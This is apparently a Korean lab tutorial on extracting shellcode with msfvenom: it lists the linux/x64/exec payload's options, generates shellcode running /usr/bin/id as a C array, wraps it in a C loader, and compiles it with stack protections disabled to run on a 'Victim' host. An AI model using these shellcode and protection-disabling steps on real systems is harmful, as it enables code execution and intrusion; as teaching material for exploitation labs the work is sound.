msfvenom 을 이용한 쉘 코드 추출하기

실습> msfvenom 을 이용한 쉘코드 추출하기

Attacker# msfvenom -h
Attacker# ls -l /usr/bin/msfvenom
Attacker# ls -l /etc/alternatives/msfvenom
Attacker# ls -l /usr/share/metasploit-framework
Attacker# msfvenom -l payloads 
Attacker# msfvenom -l payloads | grep linux/x64/exec
    linux/x64/exec                                      Execute an arbitrary command or just a /bin/sh shell

payload 옵션 확인
Attacker# msfvenom -p linux/x64/exec --list-options
Options for payload/linux/x64/exec:
=========================


       Name: Linux Execute Command
     Module: payload/linux/x64/exec
   Platform: Linux
       Arch: x64
Needs Admin: No
 Total size: 21
       Rank: Normal

Provided by:
    ricky
    Geyslan G. Bem <geyslan@gmail.com>

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
CMD                    no        The command string to execute

Description:
  Execute an arbitrary command or just a /bin/sh shell



Advanced options for payload/linux/x64/exec:
=========================

    Name                     Current Setting  Required  Description
    ----                     ---------------  --------  -----------
    AppendExit               false            no        Append a stub that executes the exit(0) system
                                                        call
    MeterpreterDebugLevel    0                yes       Set debug level for meterpreter 0-3 (Default ou
                                                        tput is strerr)
    NullFreeVersion          false            yes       Null-free shellcode version
    PrependChrootBreak       false            no        Prepend a stub that will break out of a chroot
                                                        (includes setreuid to root)
    PrependFork              false            no        Prepend a stub that starts the payload in its o
                                                        wn process via fork
    PrependSetgid            false            no        Prepend a stub that executes the setgid(0) syst
                                                        em call
    PrependSetregid          false            no        Prepend a stub that executes the setregid(0, 0)
                                                         system call
    PrependSetresgid         false            no        Prepend a stub that executes the setresgid(0, 0
                                                        , 0) system call
    PrependSetresuid         false            no        Prepend a stub that executes the setresuid(0, 0
                                                        , 0) system call
    PrependSetreuid          false            no        Prepend a stub that executes the setreuid(0, 0)
                                                         system call
    PrependSetuid            false            no        Prepend a stub that executes the setuid(0) syst
                                                        em call
    RemoteMeterpreterDebugF                   no        Redirect Debug Info to a Log File
    ile
    VERBOSE                  false            no        Enable detailed status messages
    WORKSPACE                                 no        Specify the workspace for this module

Evasion options for payload/linux/x64/exec:
=========================

    Name  Current Setting  Required  Description
    ----  ---------------  --------  -----------


포맷 형식 옵션 
msfvenom --help-formats  <-- 명령어 옵션이 변경되서 다시 확인!

명령어의 쉘코드 뽑아내기
Attacker# id
uid=0(root) gid=0(root) groups=0(root),20(dialout),120(wireshark),142(kaboxer)

Attacker# msfvenom -p linux/x64/exec CMD=/usr/bin/id -f c -o shellcode1.c
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 48 bytes
Final size of c file: 228 bytes
Saved as: shellcode1.c

Attcker# cat shellcode1.c
unsigned char buf[] =
"\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52"
"\x66\x68\x2d\x63\x54\x5e\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73"
"\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x56\x57\x54\x5e\x6a\x3b"
"\x58\x0f\x05";

소스코드 수정
생성된 shellcode1.c 파일을 C언어의 소스코드로 수정한다.
Attcker# vi shellcode1.c

/*  * 파일명 : shellcode1.c  * 프로그램 설명 : 쉘코드 테스트하기  * 작성자 : linuxmasternet  * 작성자 : 2022.01.3  */ #include <stdio.h> // id를 실행하는 쉘코드 unsigned char buf[] = "\x48\xb8\x2f\x62\x69\x6e\x2f\x73\x68\x00\x99\x50\x54\x5f\x52" "\x66\x68\x2d\x63\x54\x5e\x52\xe8\x0c\x00\x00\x00\x2f\x75\x73" "\x72\x2f\x62\x69\x6e\x2f\x69\x64\x00\x56\x57\x54\x5e\x6a\x3b" "\x58\x0f\x05"; int main() {     int (*shellcode)();     shellcode = (int(*)())buf;     (int)(*shellcode)();     return 0; }

컴파일 및 실행
소스코드를 컴파일하고 실행한다.
최신 OS들은 기본적으로 메모리(스택)는 실행 코드가 올라가도 그 코드의 실행을 방지한다.
Attcker# gcc -o shellcode1 shellcode1.c
Attacker ~# echo $SHELL
/bin/bash

Attcker# ./shellcode1
segmentation fault 

컴파일할 때 메모리(스택)에서 코드가 실행될 수 있도록 메모리 보호옵션을 해제한다.
Attacker# gcc -fno-stack-protector -z execstack -o shellcode1 shellcode1.c
Attacker# ./shellcode1
Segmentation fault

Kali에서 안되서 CentOS7에 가져와서 컴파일한 후에 실행한다.
Victim# vi shellcode1.c

Victim# gcc -fno-stack-protector -z execstack -o shellcode1 shellcode1.c
Victim# ./shellcode1
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023